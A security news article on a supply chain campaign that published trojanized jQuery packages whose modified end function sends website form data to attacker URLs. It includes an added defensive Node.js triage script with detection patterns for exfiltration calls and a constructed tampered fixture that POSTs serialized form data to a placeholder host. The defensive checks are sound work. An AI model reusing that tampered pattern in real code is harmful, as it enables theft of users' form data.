Trojanized jQuery Packages Spread via Complex Supply Chain Attack

Published: 23/11/2024   Category: security


The campaign, which distributes dozens of malicious jQuery variants across npm, GitHub, and jsDelivr, appears to be a manual effort, and lacks the typical pattern that characterizes similar, related attacks.

Once again, cyberattackers are targeting JavaScript developers, this time in a complex and persistent supply chain attack that's distributing Trojanized packages for the popular JavaScript library jQuery across GitHub, Node Package Manager (npm), and jsDelivr repositories.
Each package contains a copy of jQuery with one small difference: the end function, a part of the jQuery prototype, is modified to include additional malicious code designed to extract website form data and send it to one of many URLs.
That's according to the Phylum Research Team, which said that the campaign shows "an unusual lack of a clear pattern of nomenclature and attribution, which deviates from typical software supply chain attacks of this kind; it stands out due to the high variability across packages," as the team wrote in a recent blog post.
The unknown attackers have been spreading dozens of malicious jQuery packages since May 26, according to the research. Phylum researchers discovered the first malicious jQuery variant on npm, the default package manager for the JavaScript runtime Node.js; this variant was then published in dozens of npm packages over a month's time. Later, the researchers found instances of the Trojanized jQuery on other platforms, such as GitHub, and even found a version in a content delivery network (CDN)-hosted resource on jsDelivr.
The volume of the published packages so far is relatively minimal, with about 68 in total found, the researchers said. The packages are often named jquery.min.js, with other variations such as registration.min.js, icon.min.js, and fontawesome.js. The exfiltration URLs were almost unique for each package, and the attacker published to npm under new usernames, according to the post.
Sometimes a single user would publish multiple, related malicious jQuery packages, while other times the attackers included multiple file versions with different names within the same project. Moreover, almost every package also contains personal files not typically included in npm publications, such as the npm cache folder, npm logs folder, and a termux.properties file.
"Overall, this attack is unlike most we've seen at this scale, which typically have a clear, well-defined pattern and an obvious automated aspect," the team noted. "Here, the ad-hoc nature and custom variability of the packages, along with the long timeframe over which they were published, suggest that each package was manually assembled and published."
The manual nature of the attack tracks with evidence that it appears to be a targeted effort: It takes a specific set of victim actions for the malware to execute.
For the malware to be triggered, a user must install one of the malicious packages, use the included trojanized jQuery file, and then invoke either the end function or the fadeTo function, according to the post.
That said, while the end function itself doesn't appear to be widely used directly in development that uses jQuery, the fadeTo function, part of jQuery's animation toolkit, calls this end method internally and is far more widely used, the team noted.
This specific chain of conditions makes it unclear whether this is a highly targeted attack or if the attacker is simply blending in well and randomly affecting users who download and use these packages, according to the post.
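As an added example (not code from Phylum or the article), the following Node.js script applies two triage checks that the findings above suggest: it extracts the `end` method from a jQuery build, compares it with the canonical one-line body, and flags any network or form-serialization calls inside it; and it flags the stray personal files (npm cache and log folders, termux.properties) the researchers saw inside the packages. The canonical `end` body is jQuery 3.x's; the sample inputs and the `collector.invalid` URL are constructed.

```javascript
// Added example, not code from Phylum or the article: heuristic triage checks a reviewer can run
// over a vendored jquery.min.js and a package's file list before it reaches a build.
// All sample inputs are constructed; the URL uses the reserved .invalid TLD as a placeholder.

// Canonical body of jQuery.fn.end (jQuery 3.x): "return this.prevObject || this.constructor();"
const CANONICAL_END = /^\s*return\s+this\.prevObject\s*\|\|\s*this\.constructor\(\s*\)\s*;?\s*$/;
// Behaviours that have no business inside a chain-navigation helper like end().
const EXFIL_PATTERNS = [
  [/\bfetch\s*\(/, 'fetch() call'],
  [/XMLHttpRequest/, 'XMLHttpRequest use'],
  [/sendBeacon\s*\(/, 'navigator.sendBeacon() call'],
  [/\.serialize(Array)?\s*\(|new\s+FormData\b/, 'form serialization'],
  [/https?:\/\//, 'hard-coded URL'],
];

// Return the text between the braces of `end: function () { ... }`, or null if absent.
// Plain brace counting (no string-literal awareness) is adequate for a first triage pass.
function extractEndBody(src) {
  const m = /\bend\s*:\s*function\s*\(\s*\)\s*\{/.exec(src);
  if (!m) return null;
  const start = m.index + m[0].length;
  let depth = 1, i = start;
  while (i < src.length && depth > 0) {
    if (src[i] === '{') depth++;
    else if (src[i] === '}') depth--;
    i++;
  }
  return depth === 0 ? src.slice(start, i - 1) : null;
}

// Classify a jQuery build: 'ok' when end() is untouched, otherwise 'suspect' with reasons.
function checkEndMethod(src) {
  const body = extractEndBody(src);
  if (body === null) return { status: 'missing', findings: [] };
  const findings = [];
  if (!CANONICAL_END.test(body)) findings.push('end() body differs from canonical jQuery');
  for (const [re, label] of EXFIL_PATTERNS) if (re.test(body)) findings.push(label);
  return { status: findings.length ? 'suspect' : 'ok', findings };
}

// Stray files Phylum reported inside the packages; none of them belongs in an npm publication.
const STRAY_FILE_PATTERNS = [/(^|\/)\.npm\//, /(^|\/)_logs\//, /(^|\/)_cacache\//, /(^|\/)termux\.properties$/];
function flagStrayFiles(fileList) {
  return fileList.filter((f) => STRAY_FILE_PATTERNS.some((re) => re.test(f)));
}

// Constructed fixtures: a clean minified end() and one tampered in the way the article describes.
const CLEAN = 'end:function(){return this.prevObject||this.constructor()},';
const TAMPERED = 'end:function(){fetch("https://collector.invalid/",{method:"POST",body:this.serialize()});return this.prevObject||this.constructor()},';
```

Run it against the file list and jQuery source of any package whose name matches the campaign's naming (jquery.min.js, registration.min.js, icon.min.js, fontawesome.js); a 'suspect' verdict or any stray file is reason to quarantine the package before a human review.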
Moreover, despite the narrow set of conditions required to trip the malware, the broad distribution of the packages means the attack can potentially have a wide impact that affects many unsuspecting developers, "exemplifying the rising complexity and potential for the broad reach of supply chain threat actors," the team noted.
Indeed, the publication of malicious npm and other code packages to popular developer repositories has become a veritable security epidemic, with state-sponsored threat actors like North Korea's Moonstone Sleet and other threat actors using this tactic as a way to poison code across the software supply chain and thus reach a broad attack surface with minimal effort.
The increase in supply chain attacks that leverage code repositories requires heightened vigilance not only within the open source communities that manage the projects, but also among organizations, which are encouraged to scan any code used in development projects before distributing it to developers.
To help developers who use jQuery avoid installing the malicious packages, Phylum's researchers included in the blog post a list of all the package names related to the campaign, the date each was published, and the username that published it. They also included a long list of domains related to the campaign.
